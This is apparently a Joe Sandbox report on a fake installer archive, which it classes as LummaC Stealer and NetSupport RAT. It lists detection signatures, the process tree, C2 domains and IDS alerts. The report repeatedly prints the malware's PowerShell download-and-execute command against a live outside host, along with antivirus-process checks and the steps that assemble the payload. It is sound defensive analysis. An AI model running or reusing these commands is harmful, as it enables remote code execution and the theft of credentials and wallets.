Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
installer_1.05_36.4.zip

Overview

General Information

Sample name:installer_1.05_36.4.zip
Analysis ID:1581027
MD5:fa2d5db52457d89d27b5d216bca32d78
SHA1:a34f683167ad199013782d71e3071469e47e484b
SHA256:9e8632f63da4af51c0b1754a0dd605df455e46aa099da11616e74938c39cdad5
Infos:

Detection

NetSupport RAT, LummaC, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 6956 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 744 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • installer_1.05_36.4.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe" MD5: 911D5567537C6BB8413884309387BB54)
    • cmd.exe (PID: 1992 cmdline: "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3688 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6836 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7012 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7016 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3424 cmdline: cmd /c md 709182 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6336 cmdline: extrac32 /Y /E Bet MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 1460 cmdline: findstr /V "brandon" M MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6612 cmdline: cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Lightweight.com (PID: 2920 cmdline: Lightweight.com N MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 2884 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2424 cmdline: powershell -exec bypass MZP MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 1360 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • notepad.exe (PID: 988 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["laborersquei.click", "screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz"], "Build id": "jMw1IE--psyche"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        SourceRuleDescriptionAuthorStrings
        0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          Process Memory Space: 7zG.exe PID: 744JoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Process Memory Space: Lightweight.com PID: 2920JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                SourceRuleDescriptionAuthorStrings
                10.3.7zG.exe.1bfd0a76ee0.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7016, ProcessName: findstr.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:15.238752+010020283713Unknown Traffic192.168.2.1649708172.67.166.49443TCP
                  2024-12-26T18:26:17.574360+010020283713Unknown Traffic192.168.2.1649709172.67.166.49443TCP
                  2024-12-26T18:26:20.168775+010020283713Unknown Traffic192.168.2.1649710172.67.166.49443TCP
                  2024-12-26T18:26:22.623747+010020283713Unknown Traffic192.168.2.1649711172.67.166.49443TCP
                  2024-12-26T18:26:25.098426+010020283713Unknown Traffic192.168.2.1649712172.67.166.49443TCP
                  2024-12-26T18:26:27.450829+010020283713Unknown Traffic192.168.2.1649713172.67.166.49443TCP
                  2024-12-26T18:26:29.931478+010020283713Unknown Traffic192.168.2.1649714172.67.166.49443TCP
                  2024-12-26T18:26:32.092068+010020283713Unknown Traffic192.168.2.1649715172.67.166.49443TCP
                  2024-12-26T18:26:34.310326+010020283713Unknown Traffic192.168.2.1649716172.67.166.49443TCP
                  2024-12-26T18:26:36.436579+010020283713Unknown Traffic192.168.2.1649717172.67.166.49443TCP
                  2024-12-26T18:26:39.389022+010020283713Unknown Traffic192.168.2.1649718185.161.251.21443TCP
                  2024-12-26T18:26:41.577184+010020283713Unknown Traffic192.168.2.1649719172.67.214.186443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:16.259072+010020546531A Network Trojan was detected192.168.2.1649708172.67.166.49443TCP
                  2024-12-26T18:26:18.350202+010020546531A Network Trojan was detected192.168.2.1649709172.67.166.49443TCP
                  2024-12-26T18:26:37.202088+010020546531A Network Trojan was detected192.168.2.1649717172.67.166.49443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:16.259072+010020498361A Network Trojan was detected192.168.2.1649708172.67.166.49443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:18.350202+010020498121A Network Trojan was detected192.168.2.1649709172.67.166.49443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:42.505942+010020084381A Network Trojan was detected172.67.214.186443192.168.2.1649719TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-26T18:26:28.215871+010020480941Malware Command and Control Activity Detected192.168.2.1649713172.67.166.49443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPKAvira URL Cloud: Label: malware
                  Source: https://klipsyzogey.shop/Avira URL Cloud: Label: malware
                  Source: https://klipsyzogey.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["laborersquei.click", "screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz"], "Build id": "jMw1IE--psyche"}
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: inherineau.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: scentniej.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: laborersquei.click
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: inherineau.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: scentniej.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: laborersquei.click
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString decryptor: jMw1IE--psyche
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3efff8b4-4
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.16:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.16:49719 version: TLS 1.2
                  Source: Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdbu source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2167934211.00000000088FA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64.exe
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb+ source: winrar-x64.exe
